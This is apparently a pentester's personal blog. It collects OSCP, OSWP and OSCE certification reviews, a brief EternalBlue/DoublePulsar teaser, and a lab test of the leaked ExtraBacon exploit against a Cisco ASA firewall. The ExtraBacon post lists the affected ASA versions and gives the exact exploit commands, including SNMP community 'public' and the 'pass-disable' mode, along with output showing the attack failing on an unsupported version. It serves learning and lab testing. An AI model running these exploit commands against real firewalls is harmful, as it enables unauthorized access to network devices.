EternalBlue NSA Leak Exploit Test!

Hello everyone, sorry i have been away for a while, but i am serving currently in the army.
Here is a teaser for the eternalblue exploit that was leaked by the NSA from the shadowbrokers combined with meterpreter!

You can see the exploit being set and fired! And then using the doublepulsar to execute the meterpreter on the victim.

Advertisements

Finally OSCE Certified!

offsec-student-certified-emblem-rgb-osce

Hello to everyone that checks my blog 🙂 I finally managed to get OSCE.
have many things to tell you about it. The cracking the perimeter course does’t have a lab, not like OSCP’s anyway.
Although it does contain like 5 machines that will help you go through the PDF and redo the exercises.
In my opinion i thought that OSCE was so much easier compared to OSCP, because all you needed was actually in the PDF.OSCP’s knowledge was vast but in OSCE, not so much, it was quite concentrated.
It might need some more advanced knowledge than OSCP but it was easy if you have it.
So a few things about the exam and that is it! The exam had four challenges. You had to score
at least 75/90. Yes the top grade is 90 not 100. The challengeds had appointed points of 15,15,30,30.
So you could skip pretty much at least one of the 15 points challenges. One of the 15 points challenge is pretty easy 😀 The rest were kinda hard but not so much. In a scale of 1 to 10, i would say 6?maybe 7? And you have 48 hour. In conclusion you have quite good chances of passing this as long as you do have the necessary knowledge!
It feels great that i managed to get this knowledge and i am down on trying OSEE in a couple of years, where i will have a good job that will it for me. It is too expensive!

That is all people 😉 CYA .
Everyone have fun and take care!

ExtraBacon Test On ASA Firewall

Hello everyone. i found some free time today and thought to give it a shot on extrabacon exploit of NSA’s Leaked stuff…
there are already some successful articles out there about it but i wanted to show you what happens on a newer ASA firewall when the explot fails.

Extrabacon exploit is a remote code execution exploit against Cisco Adaptive Security Appliance (ASA) devices affecting ASA versions 802, 803, 804, 805, 821, 822, 823, 824, 825, 831, 832, 841, 842, 843, 844. It exploits an overflow vulnerability using the Simple Network Management Protocol (SNMP) and relies on knowing the target’s uptime and software version.

In my case i installed a firewall ASA 921 and of course it didn’t work as expected. This version is not affected.
This is the outcome of the execution for info


root@trickster0-virtual-machine:/home/trickster0/Desktop/EXBA# python extrabacon_1.1.0.1.py info -t 192.168.0.128 -v -c public
WARNING: No route found for IPv6 destination :: (no default route?)
Logging to /home/trickster0/Desktop/EXBA/concernedparent
[+] Executing: extrabacon_1.1.0.1.py info -t 192.168.0.128 -v -c public
[+] running from /home/trickster0/Desktop/EXBA
[+] probing target via snmp
[+] Connecting to 192.168.0.128:161
****************************************
[+] Data returned
[+] 0000 30 7D 02 01 01 04 06 70 75 62 6C 69 63 A2 70 02 0}.....public.p.
[+] 0010 01 00 02 01 00 02 01 00 30 65 30 3C 06 08 2B 06 ........0e0<..+.
[+] 0020 01 02 01 01 01 00 04 30 43 69 73 63 6F 20 41 64 .......0Cisco Ad
[+] 0030 61 70 74 69 76 65 20 53 65 63 75 72 69 74 79 20 aptive Security
[+] 0040 41 70 70 6C 69 61 6E 63 65 20 56 65 72 73 69 6F Appliance Versio
[+] 0050 6E 20 39 2E 32 28 31 29 30 0F 06 08 2B 06 01 02 n 9.2(1)0...+...
[+] 0060 01 01 03 00 43 03 00 92 E0 30 14 06 08 2B 06 01 ....C....0...+..
[+] 0070 02 01 01 05 00 04 08 63 69 73 63 6F 61 73 61 .......ciscoasa
###[ SNMP ]###
version =
community =
\PDU \
|###[ SNMPresponse ]###
| id =
| error =
| error_index=
| \varbindlist\
| |###[ SNMPvarbind ]###
| | oid =
| | value =
| |###[ SNMPvarbind ]###
| | oid =
| | value =
| |###[ SNMPvarbind ]###
| | oid =
| | value =
[+] End of Data returned

[+] response:
###[ SNMP ]###
version =
community =
\PDU \
|###[ SNMPresponse ]###
| id =
| error =
| error_index=
| \varbindlist\
| |###[ SNMPvarbind ]###
| | oid =
| | value =
| |###[ SNMPvarbind ]###
| | oid =
| | value =
| |###[ SNMPvarbind ]###
| | oid =
| | value =

[+] firewall uptime is 37600 time ticks, or 0:06:16

[+] firewall name is ciscoasa

[-] target is running Cisco Adaptive Security Appliance Version 9.2(1), which is NOT supported
Data stored in key file : unsupported
Data stored in self.vinfo: UNSUPPORTED

To check the key file to see if it really contains what we're claiming:
# cat /home/trickster0/Desktop/EXBA/keys/Y57qgB.key

This is the output for the exec


root@trickster0-virtual-machine:/home/trickster0/Desktop/EXBA# python extrabacon_1.1.0.1.py exec -t 192.168.0.128 -v -c public --mode pass-disable
WARNING: No route found for IPv6 destination :: (no default route?)
Logging to /home/trickster0/Desktop/EXBA/concernedparent
[+] Executing: extrabacon_1.1.0.1.py exec -t 192.168.0.128 -v -c public --mode pass-disable
[+] running from /home/trickster0/Desktop/EXBA
[+] probing target via snmp
[+] Connecting to 192.168.0.128:161
****************************************
[+] Data returned
[+] 0000 30 7D 02 01 01 04 06 70 75 62 6C 69 63 A2 70 02 0}.....public.p.
[+] 0010 01 00 02 01 00 02 01 00 30 65 30 3C 06 08 2B 06 ........0e0<..+.
[+] 0020 01 02 01 01 01 00 04 30 43 69 73 63 6F 20 41 64 .......0Cisco Ad
[+] 0030 61 70 74 69 76 65 20 53 65 63 75 72 69 74 79 20 aptive Security
[+] 0040 41 70 70 6C 69 61 6E 63 65 20 56 65 72 73 69 6F Appliance Versio
[+] 0050 6E 20 39 2E 32 28 31 29 30 0F 06 08 2B 06 01 02 n 9.2(1)0...+...
[+] 0060 01 01 03 00 43 03 00 E3 BC 30 14 06 08 2B 06 01 ....C....0...+..
[+] 0070 02 01 01 05 00 04 08 63 69 73 63 6F 61 73 61 .......ciscoasa
###[ SNMP ]###
version =
community =
\PDU \
|###[ SNMPresponse ]###
| id =
| error =
| error_index=
| \varbindlist\
| |###[ SNMPvarbind ]###
| | oid =
| | value =
| |###[ SNMPvarbind ]###
| | oid =
| | value =
| |###[ SNMPvarbind ]###
| | oid =
| | value =
[+] End of Data returned

[+] response:
###[ SNMP ]###
version =
community =
\PDU \
|###[ SNMPresponse ]###
| id =
| error =
| error_index=
| \varbindlist\
| |###[ SNMPvarbind ]###
| | oid =
| | value =
| |###[ SNMPvarbind ]###
| | oid =
| | value =
| |###[ SNMPvarbind ]###
| | oid =
| | value =

[+] firewall uptime is 58300 time ticks, or 0:09:43

[+] firewall name is ciscoasa

[-] target is running Cisco Adaptive Security Appliance Version 9.2(1), which is NOT supported
Data stored in key file : unsupported
Data stored in self.vinfo: UNSUPPORTED
[+] generating exploit for exec mode pass-disable
[-] unsupported target version, abort

I will try and test some more stuff for fun. Have a nice day everyone!

OSWP Certified!

offsec-student-certified-emblem-rgb-oswp

Hello everyone. It has been a while since i last wrote an article, i was busy at work. I took the OSWP exam.
OSWP exam was super easy! I finished in like 40 minutes and then immediately wrote the report for it.
There was no WPS cracking but it included all the attacks about WEP and WPA.
I studied the pdf in 4 hours, more like a quick read to remember stuff since i had my experience with wireless hacking.
After a few days my pass verification email arrived. Nothing more to add on this subject. I am ready to take the OSCE exam now 🙂
Something irrelevant with the exam, i found my first 0Day in the company i work about unauthenticated database download in the web application of an embedded custom device, that my company provides to clients. 🙂 Unfortunately, they won’t allow me to release the POC 😥

That is all folks, have fun, bye!

OSCP Certified at last! + Review :D

offsec-student-certified-emblem-rgb-oscp

Hello Everyone.
I finally got my OSCP. I got the mail verification a couple of hours ago. I am quite happy.
Dear Thanasis,

We are happy to inform you that you have successfully completed the Penetration Testing with Kali Linux certification exam and have obtained your Offensive Security Certified Professional (OSCP) certification.

Offsec Lab Part

Ok so my experience in the lab was easier than i expected. The lab had 50 machines(51 actually but i won’t say why). Most of them are super easy, others were of medium difficulty and others were quite hard. The ones i found the hardest were, freebsd and humble! Freebsd wasn’t exactly hard, but it required too much trickiness.
I must say that when i was reading those reviews, people kept saying they will miss the labs, i was thinking “ye right get that damn certificate who cares for the lab” but i must say they were very fun! i was hacking all the time. Humble was hard cause of so much trial and error that tired you in the end.

Exam Part
Ok i must say that i didn’t pass the first time even though i completed all the machines of all the labs in 26 days.
But let me make a small comment here and say, DO NOT GET INTIMIDATED BY THIS!
First mistake i did about my first exam was the fact that i read so many reviews.
Everyone was like hardest exam ever, i could’t pass and i had an IT background. ok so ignore all of this like i should have done.
That was my first mistake. Second mistake, that i can’t verify now really, is the fact that i was scanning a host with nmap and 2 ports weren’t appearing open.
I needed one of them to get a shell, then on the moment that i was ready to give up, a friend sent me a script he uses to scan that utilized unicornscan.
I gave that a try and what do you know. It showed 2 more ports! i ran the exploit and got shell right away! I had spent like 7 hours on that machine.
I don’t know what the problem was. I told offsec of course so that will not happen again to anyone, but they told me it was working properly.
Third mistake was the fact that i could not sleep the previous day very well so i got tired fast.
So if you add up all those stuff it made me fail! Although i did the buffer overflow machine in 20 minutes.

The second time i took the exam, i was serious, i mean very very serious. There was no way i would fail this. So i started that script(i will add it in the resources tab for anyone who is interested) while i took on the buffer overflow, which i hacked in 15 minutes 😛 (new record). Then i moved onto the 10 point machine which surprisingly was a bit tricky but not difficult. I moved on the 20 point machine quickly rooted it and then an idea popped up about the 10 point machine.
I came back and rooted it too. I stuck on the other 20 point machine so i moved onto the 25 point machine which i got a shell very quickly. In the end, i found not one but two different ways to escalate it. I don’t know if that was intended or not, either way there weren’t easy to be found. The last 20 point machine, i couldn’t hack it. I reached up to a point but nothing after that.
I sent my report the next day and the next one offsec sent me an email! my heart pounded like crazy! They told me they required more steps about the buffer overflow!!!! I was frozen! I was like what am i gonna do now? i didn’t take screenshots for previous steps. Thank god though, they just told me to write a detailed step by step description which i did. It took like 20 minutes but i was super stressed cause of that. Obviously everything worked out though.

Conclusion

The OSCP was a great experience! It was the first time i did something like this and proved not only to myself but to everyone else that i am that good and i am gonna move on to get even better! Sky is not the limit! The next universe is! I plan to surpass that too! Anyway do not get intimidated by any reviews you see online, mine included! Of course to take this course, you cannot be a noob. Just because it is the first certificate Offensive security provies, does not mean it is an introductory one. Don’t ask where i can start off. I really can’t recommend you something except from this! The pdf is great for the newbies although networking and some basic programming must be a standard to even begin this. Of course it would be great if you would have some previous experience. Vulnhub is not a bad idea to check.

Anyway that is my story it was an awesome experience and i can’t wait to go against OSWP and OSCE. I would totally love to take on OSEE! It seems amazing.

I want to thank offensive-security for this great experience and their whole structure really! They are very organized but one thing you should change is, to add
a live chat for the challenges part. It stressed me really really hard when they required more details and they didn’t even give me an example.
That was the only problem i had. About the admins now! One name —-> Haken29a best guy i talked from the admins and ryujin is pretty cool.
Haken29a helped me so much with each problem i had about connectivity or other stuff.

Anyway time to find a job as a pentester now hopefully and do some really deep research on buffer overflows!

OSCP Day 26

Hey everyone. I have finished hacking all the machines in the labs(public,dev,it,admin) since last night. The experience was great i learnt a couple of things i didnt know, i used ssh portfwd that i had never used before, cause i didnt need to! As an overall review of the machines, i can say that they were super fun, i enjoyed especially the dev network which happened to be the last one i hacked ^_^.
So the machines in the labs are 49 if you exclude the msf pro one , which you do not hack, and i completed all of them 😀 Lets just hope so that the exam will seem easy to me too! That is it!
Many thanks to Haken29a which helped me A LOT as an admin with some issues,Haken if u see this thx a lot talk to me in the irc some time :P. Almost all the admins were great(only 1 bad comes to mind i won’t say who :P).Have fun everyone… if you have any questions please dont hesitate to ask, i will be on irc or you can leave a comment here, bye 😉

OSCP Day 23

After so many days i decided to write my next review! everything is great 10 machines left for finishing the whole lab(including IT,dev,admins). This was a great experience and i learnt a couple of new things! i will write one more review when i finish! it should be in 2-3 days. It took me a while cause i went in a trip for 3 days for a ctf(very hard one with TOO much Social engineering). So after a point machines seemed like a child’s play although i had some issues with proxychains, i hope noone will meet them 😀 Up till now i can say that the hardest machines were freebsd,humble. That is it for me! cya on my next review!! HAVE FUN EVERYONE!